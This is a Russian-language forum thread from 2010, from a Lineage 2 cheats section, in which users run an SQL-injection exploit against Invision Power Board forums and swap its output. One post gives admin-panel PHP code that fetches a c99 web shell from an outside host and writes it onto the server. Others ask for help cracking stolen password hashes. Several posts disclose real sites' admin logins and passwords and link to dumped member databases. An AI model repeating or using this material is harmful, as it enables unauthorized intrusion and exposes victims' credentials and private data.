Рабочая уязвимость на l2europe.net (сервер из топ15)

Toopoi · 08.04.2010, 19:58

умя такая проблема делаю все норм но какаято ошибка

*[Ссылки могут видеть только зарегистрированные пользователи. ]
/IDS bypass:1
/Cheking sql-injection..
-Forum unvulnerable
/Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+[08.04.2010. 21:50:23]
+Total:1
Z:\usr\local\php5>

shamrik · 08.04.2010, 20:14

Цитата:

Сообщение от Toopoi


	умя такая проблема делаю все норм но какаято ошибка [Ссылки могут видеть только зарегистрированные пользователи.* ] /IDS bypass:1 /Cheking sql-injection.. -Forum unvulnerable /Try [Ссылки могут видеть только зарегистрированные пользователи. ] +[08.04.2010. 21:50:23] +Total:1 Z:\usr\local\php5>

Там уже стоит IPB 2.3.6

maksline · 09.04.2010, 11:26

я был бы очень признателен если бы вы помогли мне расшифровать
+ Ok, using hash 47afebaef8098a0af34963b813d10535
/ Trying to get the password salt
/
+ Ok, using salt ?T"{A
Спасибо за ранее

Toopoi · 09.04.2010, 19:29

дайти плиз форум с рабочий дырой где не проверял не рубит хоть разобратс либа я не то делаю либа не нахажу то что надо

**cavern** · 09.04.2010, 19:57

еще один способ заливки шелла:
Админцентр > настройки > Cookies > Добавить настройку > название: shell > PHP код:

Код:

$data=implode('',file('http://www.proof-h.org/shell/c99.txt'));  
$fp=fopen('./shell.php','wb'); 
fputs($fp,$data); 
fclose($fp);

сохраняем, шелл будет доступен по /forum/admin/shell.php

кстати вот еще один шелл, как на видео, думаю с помощью заливки одного этот залить не составит труда: _http://slil.ru/28934193

maksline пфф расшифровал за 2 секунды, пароль: 147369

**SetFer** · 09.04.2010, 20:26

Attack(s):

+ [06.04.2010 22:57:13]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Script not found
/ Try лялялялялялял
+ [06.04.2010 22:57:14]
+ Total: 1

Ответьте на эту проблему плиз народ)

SandeL · 09.04.2010, 20:41

Народ расшифруйте плиз

+ Ok, using hash b0ef4c06dbdc7185b043d2e125bd3923
/ Trying to get the password salt
/
+ Ok, using salt Eio+6
+ Enjoy!

**cavern** · 09.04.2010, 21:33

можете потренироваться, хеши в PasswordPro расшифровывают

Код:

 Attack(s):

 + [09.04.2010 20:39:01]
 + http://mmo-itp.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 1
 / Trying to get the password hash
 + pass_hash=a1b820aa0f7fcd4a827d8286eddda74e
 + Ok, using hash a1b820aa0f7fcd4a827d8286eddda74e
 / Trying to get the password salt
 + pass_salt=-R]]3
 + Ok, using salt -R]]3
 + Enjoy!

 + [09.04.2010 20:56:14]
 + Total: 188

админ логин: Insane
пасс: yaebashu
залил шеллов в uploads, т.к. нет прав заливать в другие папки
первый шелл через скины: [Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
данные БД находятся в файле conf_global.php

п.с. сразу форум не убивайте тока)
п.с.с вот вся база одного из форумов, который уже удален _http://slil.ru/28934666
а вот отдельно дамп members.sql _http://slil.ru/28934674
кто знает что можно извлечь из базы ФОРУМА?

setfer префиксы хз, можно попробовать в пхп файле найти и заменить все ibf_ на ipb_ и то не факт что там такой префикс)
Script not found это значит что уязвимый код не найден, получить хеш не возможно

upd: [Ссылки могут видеть только зарегистрированные пользователи. ]
админ емайл [email protected]
пасс asdfasdf

шеллы:
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

**SetFer** · 09.04.2010, 22:37

B смысле в пхп в файле експлоита изменить все ipf на ipb?

**Chipito** · 16.04.2010, 12:39

2.3.5 Не ломаются,надо чтоб был форум именно NULL RU

~~Underwhy~~ · 16.04.2010, 13:21

Цитата:

Сообщение от chipito


	2.3.5 Не ломаются,надо чтоб был форум именно NULL RU

Вообще-то скрипт написан для 2.3.5

sunches · 19.04.2010, 10:50

+ [19.04.2010 10:47:59]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+ [19.04.2010 10:48:00]
+ Total: 1

что это может быть?

~~Underwhy~~ · 19.04.2010, 11:08

Цитата:

Сообщение от sunches


	+ [19.04.2010 10:47:59] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. - Forum unvulnerable / Try [Ссылки могут видеть только зарегистрированные пользователи. ] + [19.04.2010 10:48:00] + Total: 1 что это может быть?

1. Форум лиц
2. Форум лиц - заплатка

sunches · 19.04.2010, 11:16

спасибо теперь проблемка в egb

D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Добавлено через 56 минут
перепбрал кучу линаговских форумов все стоят на 2,3,6

sunches · 20.04.2010, 18:26

D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Народ помогите в чем проблема?

Рабочая уязвимость на l2europe.net (сервер из топ15)

Баги и читы Lineage 2